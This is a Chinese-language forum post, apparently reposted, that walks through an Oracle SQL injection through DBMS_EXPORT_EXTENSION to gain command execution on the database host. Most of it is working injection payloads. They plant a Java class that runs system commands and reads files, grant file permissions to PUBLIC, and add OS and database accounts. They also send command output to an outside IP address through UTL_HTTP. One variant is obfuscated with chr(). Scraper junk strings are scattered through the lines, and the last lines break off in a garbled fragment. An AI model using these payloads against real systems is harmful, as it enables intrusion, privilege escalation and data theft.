
实例演示oracle注入获取cmdshell的全过程

发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
) S& h, u, G& l5 M3 F6 m% D$ c2 C6 \1 o, ]5 v, E
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
4 T- j  K3 ~) ]3 }$ ~! C8 V7 F的形式即可。(用" 'a'|| "是为了让语句返回true值) ' R4 v/ i, K' k6 Y* L+ C
语句有点长,可能要用post提交。 / }9 T3 N  l; c7 k
以下是各个步骤:
7 M! U1 y3 J5 u* n: |( ^" G  h1.创建包
5 }4 i7 C  X2 L5 i/ y7 {通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
1 _1 u* ^3 k6 d5 O/xxx.jsp?id=1 and '1'<>'a'||( # A; T* W5 g! q) ~
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! j, }2 H6 }1 e. ocreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(& ]9 K# C2 E8 G- s
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
4 m+ }" S* W# K0 M/ s}'''';END;'';END;--','SYS',0,'1',0) from dual 3 ]3 K) N& u5 N" Y9 i+ r; e
)
: `( {7 H( R# A------------------------
. L  P; A' A7 [0 P. C( W如果url有长度限制,可以把readFile()函数块去掉,即: 9 M2 G8 x. Y* Q/ t
/xxx.jsp?id=1 and '1'<>'a'||(
% M2 f; J( \4 C! h/ @2 A! iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 g3 F. z& p; c3 V0 ]0 u; q5 c$ R/ K
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
& I. o' I! \' }, z  u0 @9 Pnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
, y( [9 B+ K8 O; Y}'''';END;'';END;--','SYS',0,'1',0) from dual
# r# S( C8 o2 T1 _) - T, o2 i% Y3 C; x: K# V
同时把后面步骤 提到的 对readFile()的处理语句去掉。
6 h& e6 d. D2 ^' Z------------------------------ + }/ D  C% `4 n6 D8 C
2.赋Java权限 & T  g  F+ h; _/ b8 d; _
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
+ b1 v* \( j& d+ l6 ^. z3.创建函数 + H. c: K) K0 A* v; G7 }
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
* s/ R3 Y+ d$ w4 x2 O# }! j. jcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual5 m( f8 |/ T' o4 A" D1 b1 v& u
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ A7 _2 _- i% e/ F  z! O
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual0 A2 n% Y2 S( ^& v+ J, b$ \1 J& O
4.赋public执行函数的权限
. K$ z/ j2 ^/ k# U+ V2 Iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual0 j3 p+ D# z$ G7 f, T
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
- I: i$ w( I# v0 R9 ~5.测试上面的几步是否成功
+ O3 V6 Y7 H& H0 Yand '1'<>'11'||( # ?0 H9 ^& h5 K5 D+ [+ U* v5 ~+ }
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
6 x- D) k; n( h/ u- i)
5 H2 r) w4 s6 vand '1'<>( , e' \; P* x2 n+ x# {2 [3 z$ G( k
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' $ \: p1 i. p2 p" V! P
) 2 h# {1 O( R' z6 e4 d7 Y! D
6.执行命令:
9 J6 l6 c4 w, E( \  e/ e/xxx.jsp?id=1 and '1'<>( - q. N/ J) x3 a# M/ [" B4 U
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual ( ^" r6 n' x1 M
+ j% N- T" g  Y& |, u
) 0 g0 Y9 M8 ?- U! J5 g1 _( y
/xxx.jsp?id=1 and '1'<>( ' P+ l" ]6 i$ a$ c( T7 S
select  sys.LinxReadFile('c:/boot.ini') from dual
* c  \9 ?' g( _; j4 B' i
* K$ Z1 ]; ~$ \8 {# ]6 f3 l) })
( T/ @7 b) ^; i% j2 n/ P) h  " ~4 x0 @- x6 B! k4 q  ^
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 % l/ M: U, }& p* V$ [- W
如果要查看运行结果可以用 union : ; \6 V3 F( d1 B. b: S/ s. L" f
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
0 _2 m, u' D! v: f7 v或者UTL_HTTP.request(: * f/ v' @7 E" V9 t
/xxx.jsp?id=1 and '1'<>(
0 S8 z5 n4 W2 c% R) f3 ASELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual$ @4 I2 y4 ?& O* N* V2 ]) U% }
) 9 t. R# B2 r# C' [1 |0 K6 s
/xxx.jsp?id=1 and '1'<>( " P- Y* U# ]2 N: Q+ q1 ]5 {" H" a
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual' E9 `' ^  c6 J! H" T
) : N2 f) |2 x3 v7 j8 F
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
- a2 v+ P  y9 l" N! R& G-------------------- 1 u! w' e- U' H6 P/ ?' l! i
6.内部变化
9 \5 ^9 e: g7 E( e, d通过以下命令可以查看all_objects表达改变: . S2 L; u$ i/ t- N' a8 c' [0 ?/ e
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
0 n; B" z9 Q# L  r7.删除我们创建的函数
" [- y+ x; X) g: Z! O4 }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 ^/ I5 M/ D  H+ H( tdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ( ]- H' j2 ^- ]  e- M* h- o( I
====================================================
全文结束。谨以此文赠与我的朋友。
/ |. \" w# B2 U6 `0 n/ l5 Olinx
) ^* E1 i7 `, a# |6 l124829445 ( R: K7 N' y, c; ?7 O: `
2008.1.12 1 x+ W* D$ a5 p& b6 d3 r
linyujian@bjfu.edu.cn : f/ A0 T5 U0 E' H
======================================================================
0 M6 X1 S& ~9 u, a- Q* J. Y, S% x测试漏洞的另一方法: ; l% }. p- i& r+ h# z, ^) t9 V
创建oracle帐号:
5 Y& g4 \  S: `' f  m/ Rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 a8 f/ L8 t9 r: C+ t
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual+ _/ Q& X" S, C
即: " R, i$ d/ U7 n: O4 \- q
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
2 ]2 m4 K4 ]7 z+ hchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual - g7 `  C/ S# H& ]: Q3 c
确定漏洞存在:
6 R# S- P+ T0 @; b$ k; V1<>( " i2 w/ I/ C6 ]1 M: ?
select user_id from all_users where username='LINXSQL'
$ L. Y8 ?4 g* y9 z. l)
; Y* q3 J- w- p4 n给linxsql连接权限: * p# N3 S; ~' N7 Z- k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
4 \% L4 J6 j: r* h7 lGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual % K/ I" j5 a9 u3 G9 F! y
删除帐号: ; L, z6 V- w4 n4 T* ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 g1 A, j" U& _drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
; M% ]5 s$ O9 O' v, `======================   A/ E& D' V9 ]4 d7 w! P/ W
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
. T, A2 K! q5 X1.jsp?id=1 and '1'<>(
. ^. q, G2 N0 q; m9 o/ m* D. nselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ R* l& |* a* b0 w0 kcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
6 Q4 c/ e7 @/ a& D2 j) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
/ F6 f) d* \7 h8 I5 }) k& M( h )
( N4 C  T8 U" e! ?) Z/ c: E& Y) `$ y( w; C( ]
/ _/ N$ D9 B0 a1 L8 N& V
, f0 r$ `, A1 L2 W